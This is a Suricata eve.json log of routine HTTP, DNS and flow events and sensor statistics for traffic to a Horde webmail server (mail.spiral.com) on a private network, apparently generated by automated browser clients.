{"timestamp":"2020-02-29T00:16:22.000202+0000","event_type":"stats","stats":{"uptime":14634,"capture":{"kernel_packets":136088,"kernel_drops":0},"decoder":{"pkts":136097,"bytes":93608368,"invalid":188,"ipv4":134582,"ipv6":8,"ethernet":136097,"raw":0,"null":0,"sll":0,"tcp":129203,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2412,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22811,"memcap_state":0,"memcap_global":0},"http":{"memuse":78873,"memcap":0}}} {"timestamp":"2020-02-29T00:16:22.722948+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":17,"tx_id":0}} {"timestamp":"2020-02-29T00:16:23.000656+0000","flow_id":909784335920538,"event_type":"flow","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:22.863642+0000","end":"2020-02-29T00:11:22.975027+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:25.337206+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34852,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":434,"tx_id":0}} {"timestamp":"2020-02-29T00:16:27.000653+0000","flow_id":788838057176103,"event_type":"flow","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:26.519207+0000","end":"2020-02-29T00:11:26.627443+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:28.391364+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:28.663260+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989}} {"timestamp":"2020-02-29T00:16:29.000167+0000","event_type":"stats","stats":{"uptime":14641,"capture":{"kernel_packets":136099,"kernel_drops":0},"decoder":{"pkts":136107,"bytes":93608932,"invalid":188,"ipv4":134588,"ipv6":8,"ethernet":136107,"raw":0,"null":0,"sll":0,"tcp":129209,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2413,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":86471,"memcap":0}}} {"timestamp":"2020-02-29T00:16:32.000456+0000","flow_id":480248952220453,"event_type":"flow","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:31.748325+0000","end":"2020-02-29T00:11:31.856514+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:32.015430+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13482,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.186700+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565}} {"timestamp":"2020-02-29T00:16:32.229983+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37034,"tx_id":0}} {"timestamp":"2020-02-29T00:16:32.237663+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33890,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.397865+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982}} {"timestamp":"2020-02-29T00:16:33.000734+0000","flow_id":1221616157382490,"event_type":"flow","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1826,"bytes_toclient":18270,"start":"2020-02-29T00:15:24.907098+0000","end":"2020-02-29T00:15:32.654799+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:35.000336+0000","flow_id":16980894975856,"event_type":"flow","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:34.034672+0000","end":"2020-02-29T00:11:34.142465+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:36.000252+0000","event_type":"stats","stats":{"uptime":14648,"capture":{"kernel_packets":136127,"kernel_drops":0},"decoder":{"pkts":136159,"bytes":93634934,"invalid":188,"ipv4":134640,"ipv6":8,"ethernet":136159,"raw":0,"null":0,"sll":0,"tcp":129255,"udp":5182,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2797,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2813,"synack":2804,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1836,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2370,"failed_udp":112},"tx":{"http":4701,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2450}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2415,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":138193,"memcap":0}}} {"timestamp":"2020-02-29T00:16:37.000848+0000","flow_id":1911890401320261,"event_type":"flow","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:36.023877+0000","end":"2020-02-29T00:11:36.132194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:37.187349+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34856,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34651,"tx_id":0}} {"timestamp":"2020-02-29T00:16:37.399118+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} {"timestamp":"2020-02-29T00:16:38.401616+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:38.630480+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989}} {"timestamp":"2020-02-29T00:16:39.000242+0000","flow_id":402321488552,"event_type":"flow","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:38.244392+0000","end":"2020-02-29T00:11:38.352829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000319+0000","flow_id":1991905642280549,"event_type":"flow","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.390757+0000","end":"2020-02-29T00:11:39.498900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000701+0000","flow_id":787184495559925,"event_type":"flow","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.525557+0000","end":"2020-02-29T00:11:39.634046+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000814+0000","flow_id":2068545038709269,"event_type":"flow","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.193045+0000","end":"2020-02-29T00:11:39.301552+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:41.000604+0000","flow_id":1085409844794818,"event_type":"flow","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:40.136642+0000","end":"2020-02-29T00:11:40.244904+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.000228+0000","event_type":"stats","stats":{"uptime":14655,"capture":{"kernel_packets":136170,"kernel_drops":0},"decoder":{"pkts":136197,"bytes":93657469,"invalid":188,"ipv4":134677,"ipv6":9,"ethernet":136197,"raw":0,"null":0,"sll":0,"tcp":129290,"udp":5184,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10003,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2798,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2814,"synack":2805,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1837,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2371,"failed_udp":112},"tx":{"http":4702,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2451}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2421,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":1,"flows_timeout":3,"flows_timeout_inuse":0,"flows_removed":3,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":154227,"memcap":0}}} {"timestamp":"2020-02-29T00:16:43.001275+0000","flow_id":921415108703488,"event_type":"flow","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:42.767232+0000","end":"2020-02-29T00:11:42.875378+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.634753+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34858,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:16:44.041696+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:44.262516+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13646,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.177191+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28552,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} 